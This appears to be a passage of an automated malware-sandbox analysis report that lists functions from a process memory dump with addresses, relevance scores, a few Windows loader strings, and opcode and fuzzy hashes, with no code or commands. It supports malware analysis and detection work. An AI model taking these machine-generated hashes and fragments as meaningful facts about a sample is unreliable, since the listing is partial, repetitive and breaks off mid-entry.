                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalTags
                                                                                                                      • API String ID: 0-1106856819
                                                                                                                      • Opcode ID: faddba1d350a1077fa91d147e531531b967e27bdf0c2e35babeeea05811bb4fc
                                                                                                                      • Instruction ID: 2e634a90c67eb4ebecdaedb1294be366873a195de870107ac2eebd9fbbe36ea9
                                                                                                                      • Opcode Fuzzy Hash: faddba1d350a1077fa91d147e531531b967e27bdf0c2e35babeeea05811bb4fc
                                                                                                                      • Instruction Fuzzy Hash: 7E719FB5E0120A9FDF68DF9DC4906AEBBB1BF58710F55812FE805A7362E7308841CB60
                                                                                                                      Function 01484978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .mui
                                                                                                                      • API String ID: 0-1199573805
                                                                                                                      • Opcode ID: 4f65a1feec7067e6a365532afb2d099873b9129c36b35c18c85541ced48bbf22
                                                                                                                      • Instruction ID: 743585d4bbfa5dc1f35d564cd19aea64524084c01ce9f707fb6d05a083c0c85a
                                                                                                                      • Opcode Fuzzy Hash: 4f65a1feec7067e6a365532afb2d099873b9129c36b35c18c85541ced48bbf22
                                                                                                                      • Instruction Fuzzy Hash: 91517672D00227DBDF11EF99D844BAEFBB4AF14A14F09412BEA11BB360D7749901CBA4
                                                                                                                      Function 013FE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EXT-
                                                                                                                      • API String ID: 0-1948896318
                                                                                                                      • Opcode ID: 270e226ab42330000d5f0045fcebe84384f365df45b5e1c5a6e5228cf329ce32
                                                                                                                      • Instruction ID: 4181e1d07dd22f9e925bc03538619fd7cf8605b894fef9eee868a00b71f21d49
                                                                                                                      • Opcode Fuzzy Hash: 270e226ab42330000d5f0045fcebe84384f365df45b5e1c5a6e5228cf329ce32
                                                                                                                      • Instruction Fuzzy Hash: CF41B2725083529BD710DA79C980B6BB7D8AF8871CF05093EF784E72A0E674D908C792
                                                                                                                      Function 0145C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryHash
                                                                                                                      • API String ID: 0-2202222882
                                                                                                                      • Opcode ID: b02dd7d98fd488ed2f049f3de4070ae6680b02bdcb774293e34fbb68ed1bc9c8
                                                                                                                      • Instruction ID: 91514ddc3e91ae128e3b7c327e8a938f243f208390c23634ca6a00c86c6cf413
                                                                                                                      • Opcode Fuzzy Hash: b02dd7d98fd488ed2f049f3de4070ae6680b02bdcb774293e34fbb68ed1bc9c8
                                                                                                                      • Instruction Fuzzy Hash: 7A4175B1D0022DAADB61DA50CC80FDEB77CAB55714F0045AAEA08AB151DB709E88CF94
                                                                                                                      Function 01476B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #
                                                                                                                      • API String ID: 0-1885708031
                                                                                                                      • Opcode ID: 5c573ed5172ca71e9f160b1fe6d6cd3cc22a4e693d28d5672737f98b4640bd04
                                                                                                                      • Instruction ID: 30abbbbd74168361947b47ec171d85fb8283e842b4320752c7c3851b3fef538d
                                                                                                                      • Opcode Fuzzy Hash: 5c573ed5172ca71e9f160b1fe6d6cd3cc22a4e693d28d5672737f98b4640bd04
                                                                                                                      • Instruction Fuzzy Hash: F3312C31A00B199EFB32CB6DC850BEF7BAADF05304F15402EE940AB2A2D775D845CB50
                                                                                                                      Function 0145CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryName
                                                                                                                      • API String ID: 0-215506332
                                                                                                                      • Opcode ID: 0061088a13412d0b7f6664f622912ec82bba5bc3accb7acda80190e389298307
                                                                                                                      • Instruction ID: 8383adcde03c2360fd0e2420d7aa140e23c833fd0ac90429587b5a5569f70c26
                                                                                                                      • Opcode Fuzzy Hash: 0061088a13412d0b7f6664f622912ec82bba5bc3accb7acda80190e389298307
                                                                                                                      • Instruction Fuzzy Hash: F5310636900616AFEB15DB5DD895E7FBB78EF80720F01412AEE05A7262D7309E04DBE0
                                                                                                                      Function 0146892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0146895E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                      • API String ID: 0-702105204
                                                                                                                      • Opcode ID: 0c6c695775efef107a55044e6bd00e36cdcffccaf68ad4f0d2022bcd899074fb
                                                                                                                      • Instruction ID: 68dd176bdc23be5cc17d8e011a45284cfc71fff10d4e9922dca4baed34e7de81
                                                                                                                      • Opcode Fuzzy Hash: 0c6c695775efef107a55044e6bd00e36cdcffccaf68ad4f0d2022bcd899074fb
                                                                                                                      • Instruction Fuzzy Hash: 1801F7322013139FEB305B5AD884A5B7B6DEF9565CB14042EF64106271CF706849CB93
                                                                                                                      Function 01482000 Relevance: .8, Instructions: 757COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 74680abe0bdd922efd25c93d2eecde9d5c425a3072a5d6d1218cd733ef6831eb
                                                                                                                      • Instruction ID: e641de4291f93574ec6598d9375fabac611e34c4a8a9d97b8d19cc45d64b09b9
                                                                                                                      • Opcode Fuzzy Hash: 74680abe0bdd922efd25c93d2eecde9d5c425a3072a5d6d1218cd733ef6831eb
                                                                                                                      • Instruction Fuzzy Hash: 6A42C4356083419BDB25EF69C890E6FBBE5AF94700F58092FFA8297360D7B0D845CB52
                                                                                                                      Function 01478158 Relevance: .6, Instructions: 617COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1b36a99c32b9e664e879d70714c11d7ed9156b5be451188fc265cd6aa795ca6a
                                                                                                                      • Instruction ID: a67813f4d7baa9ab4147d9a5923e9a46ec896f14e2da7b9a71f9d6d0c9e95ac6
                                                                                                                      • Opcode Fuzzy Hash: 1b36a99c32b9e664e879d70714c11d7ed9156b5be451188fc265cd6aa795ca6a
                                                                                                                      • Instruction Fuzzy Hash: AF425C75E0021A9FEB25CF69C885BEEBBF5BF48300F15809AE949EB251D7349981CF50
                                                                                                                      Function 013F2840 Relevance: .6, Instructions: 605COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a49cb9a468100adff37216cb107f22ac1b7255148589b2d5602214b140aa91a
                                                                                                                      • Instruction ID: 5da5a3996bf2010d8d8983b1fe9a2079cd277c85955a2a66ede71ca36ce93011
                                                                                                                      • Opcode Fuzzy Hash: 1a49cb9a468100adff37216cb107f22ac1b7255148589b2d5602214b140aa91a
                                                                                                                      • Instruction Fuzzy Hash: 2632FD70A007558BEB24CF69C8447BFBBF2BF86304F25412ED58A9B3A5D735A846CB50
                                                                                                                      Function 0148A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 24fc9bd5ebfac65ea7d7d341668f4363a8f2db35d752608f0fcf7f9083d3a703
                                                                                                                      • Instruction ID: 0ff0f30829ca39a49a23d2fa541f49e5ee9c3122d8feeccf27ae37657f42812f
                                                                                                                      • Opcode Fuzzy Hash: 24fc9bd5ebfac65ea7d7d341668f4363a8f2db35d752608f0fcf7f9083d3a703
                                                                                                                      • Instruction Fuzzy Hash: B422D3702046618BEB25EF2DC05437BBBF1AF44304F28845BD9868F3A6E7B5D492DB61
                                                                                                                      Function 013E6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d7bec097cc1cefeadff37fbe64e64b49a613222e444b87a6bd5dd50463ad0a3b
                                                                                                                      • Instruction ID: 8b4f668b9c69951f661efc220c55c937e03e805e4f437b94b67ffe9bde0ec240
                                                                                                                      • Opcode Fuzzy Hash: d7bec097cc1cefeadff37fbe64e64b49a613222e444b87a6bd5dd50463ad0a3b
                                                                                                                      • Instruction Fuzzy Hash: 1B32AFB0A00315CFEB25CF69C484BAABBF5FF58314F14456AE95AAB7A1D730E841CB50
                                                                                                                      Function 01404A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                      • Instruction ID: b891de2f69b47d95a517d057be954966a4c2d9bd1388ada9c2561ae1b67f330d
                                                                                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                      • Instruction Fuzzy Hash: F4F16671E006199BEF16CF9AD540BAEBBF5EF44710F09812AEA05AB3A1D774D842CB50
                                                                                                                      Function 0147892B Relevance: .4, Instructions: 386COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 289cfee4cd52729ec8538b0f6e576fc5424ec98b051b6fcd049aff43a329bb10
                                                                                                                      • Instruction ID: e9e48f4a1c5529318c8e9af38121d5668227ebb058e80608928460ac68977d0a
                                                                                                                      • Opcode Fuzzy Hash: 289cfee4cd52729ec8538b0f6e576fc5424ec98b051b6fcd049aff43a329bb10
                                                                                                                      • Instruction Fuzzy Hash: 76D1EF71A0060B8FDF15CF69C845AFFBBF1AF88304F18816AD955A7261E735E906CB60
                                                                                                                      Function 013E65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 557f818a14a837f7450579d727cc61c33617017e185c05d28a6363912a8e00d8
                                                                                                                      • Instruction ID: fa572029a252effae04f09d617941bd7b4a4d55e2249408b0531359051203a3c
                                                                                                                      • Opcode Fuzzy Hash: 557f818a14a837f7450579d727cc61c33617017e185c05d28a6363912a8e00d8
                                                                                                                      • Instruction Fuzzy Hash: 37E1BFB1608352CFC715CF28C094A6ABBE0FF99318F05896DF99987391DB31E905CB92
                                                                                                                      Function 013D8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 27299fdaa12882ab0c01e606493b45f818ac66a7a9b0513f803fa6c23435237f
                                                                                                                      • Instruction ID: b6a4581217abeb047a10639b56bce8af52b21675016cd33b92d430edafe99c2c
                                                                                                                      • Opcode Fuzzy Hash: 27299fdaa12882ab0c01e606493b45f818ac66a7a9b0513f803fa6c23435237f
                                                                                                                      • Instruction Fuzzy Hash: D0D1F5B2A0020ADBDB14DF29D881BBA77B5FF9831CF05416EE915DB291EB30E951CB50
                                                                                                                      Function 01468243 Relevance: .3, Instructions: 322COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                      • Instruction ID: 44ab0811cfad166065785c4f2ab5b38e34a92fe0a794b1beabe20469c97b535d
                                                                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                      • Instruction Fuzzy Hash: 54B16274A007069FDF24DF99C940AABBBBDBF94308F14446FEA02977A4DA34E945CB11
                                                                                                                      Function 013F0535 Relevance: .3, Instructions: 300COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                      • Instruction ID: e3557333ed72418493fa1b608a326041dcab999ca0e7f2d06485aeb9852799e5
                                                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                      • Instruction Fuzzy Hash: 89B11531604646AFEB25DB6CC850BBEBBF6AF44204F18019EE656DB392D770E941CB90
                                                                                                                      Function 013E83C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b975b50422d11fb22e03a62f820c5f2788261c82067ff51f0981b6235412e018
                                                                                                                      • Instruction ID: 60f51e3c91445bc2926df8fb004d6bb3f868c364c5d039150278d807ade1dccf
                                                                                                                      • Opcode Fuzzy Hash: b975b50422d11fb22e03a62f820c5f2788261c82067ff51f0981b6235412e018
                                                                                                                      • Instruction Fuzzy Hash: 37C15674508341CFE764CF19C484BABB7E4BF88708F44496EE989972A1DB74E948CF92
                                                                                                                      Function 013DC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a95ae47d7a994dbf3d921beaf524a5a9e58b94c48eb4ab58a2ff8552c39088df
                                                                                                                      • Instruction ID: 4d3a3a428d91499287170c3c9afc45ca6adbfec6ba8af8d85a0c003d8be00a5f
                                                                                                                      • Opcode Fuzzy Hash: a95ae47d7a994dbf3d921beaf524a5a9e58b94c48eb4ab58a2ff8552c39088df
                                                                                                                      • Instruction Fuzzy Hash: E1B1A271A1026A8BDB34CF59D890BA9B3B6EF44304F5485EED54AE7290EB30DD85CF20
                                                                                                                      Function 0140E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ab2c759c4219135b59b29441a14af14cad8c1d945a0e13b294f1e58756897623
                                                                                                                      • Instruction ID: 7b6fd78770ca27f8ae490650b044c611b9c4392ec92f63cf784494c4588551ee
                                                                                                                      • Opcode Fuzzy Hash: ab2c759c4219135b59b29441a14af14cad8c1d945a0e13b294f1e58756897623
                                                                                                                      • Instruction Fuzzy Hash: F6A1F231E006559FEB22DBADC848BAEBBA4BB01714F05052BEA00BB3F1D7749D55CB91
                                                                                                                      Function 01420185 Relevance: .3, Instructions: 276COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e56c335dad11cd45ab2c2756fe7228ebf6ce2159f83a28f3f220e059d46ebc64
                                                                                                                      • Instruction ID: 7d1c85ba3af67ebaf15b40dab73ae4a692652741ba670bdf19d13e91cf32b007
                                                                                                                      • Opcode Fuzzy Hash: e56c335dad11cd45ab2c2756fe7228ebf6ce2159f83a28f3f220e059d46ebc64
                                                                                                                      • Instruction Fuzzy Hash: 06A1D070B0062ADFDB25CF69C490BAAB7E1FF54314F44412BEA05973A2DB34E896CB50
                                                                                                                      Function 014B4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ced242caf26ace2c46b9d8e4fcaa196197b47ef718e9e3b21ca8f8bb19d300c5
                                                                                                                      • Instruction ID: 4a9a39f8b6de180e57222e06e334a27a63defa6ef1ab3ee422865b467b34630d
                                                                                                                      • Opcode Fuzzy Hash: ced242caf26ace2c46b9d8e4fcaa196197b47ef718e9e3b21ca8f8bb19d300c5
                                                                                                                      • Instruction Fuzzy Hash: 70A1C172504612DFCB11DF18C980BAAB7E5FF58714F49052EF64A9B762D334E901CBA1
                                                                                                                      Function 014B2B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                      • Instruction ID: dcad84573a678f75c440b698f92a3e38f3f2163796121684f9018117eaa32713
                                                                                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                      • Instruction Fuzzy Hash: A0B11A71E0061ADFDF15CFA9C880AEEB7B5FF48310F14856AE914A7364D770A942CBA0
                                                                                                                      Function 014660E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 72d4de45d52dae3ac41b6023d1ab87e3aac4795c4e61db066c96320b4eb09620
                                                                                                                      • Instruction ID: 96a11c76435d33c2db47e6ee6dfe863cff0a62e867a3439c46cf24b6146707ae
                                                                                                                      • Opcode Fuzzy Hash: 72d4de45d52dae3ac41b6023d1ab87e3aac4795c4e61db066c96320b4eb09620
                                                                                                                      • Instruction Fuzzy Hash: FD91C171D00216AFDF11DF69D880BAEBFB9AF48314F16416AE610EB361D734ED408BA1
                                                                                                                      Function 013FE3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2ff71a89508f7c20930f7f58989a0ffb93b983e34573186ad63d106bd677ceb2
                                                                                                                      • Instruction ID: a233c3a6895c0c273ae0a8e2626ed72968d878d2ff26d061ba15ee3590f79fe9
                                                                                                                      • Opcode Fuzzy Hash: 2ff71a89508f7c20930f7f58989a0ffb93b983e34573186ad63d106bd677ceb2
                                                                                                                      • Instruction Fuzzy Hash: E7912432A00616CBEB24DF5DC444B7EBBA5EF98718F06407EEE09AB7A0E634D901C751
                                                                                                                      Function 01436ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fc7573f55eefbaa0f7e6d4171994639fb086070c5c40f1e63d5878044a64438e
                                                                                                                      • Instruction ID: 7c698547fa6d996b2a87e0b015786b39533a50dab7190143372ea293abed7d50
                                                                                                                      • Opcode Fuzzy Hash: fc7573f55eefbaa0f7e6d4171994639fb086070c5c40f1e63d5878044a64438e
                                                                                                                      • Instruction Fuzzy Hash: CE818271A00626ABDB18CF69C940ABEBBF9FB4C700F05852EE545E7650E334DA41CB94
                                                                                                                      Function 014AAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                      • Instruction ID: 91b8e274b8035c2cb3e8761d3aa73d12f81e6781aec56e9d7a240258ba1a4653
                                                                                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                      • Instruction Fuzzy Hash: 49819371A002069FDF19CF59C480AAEBBF2FFA4310F65856ED9569B364D734D902CB80
                                                                                                                      Function 0141E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
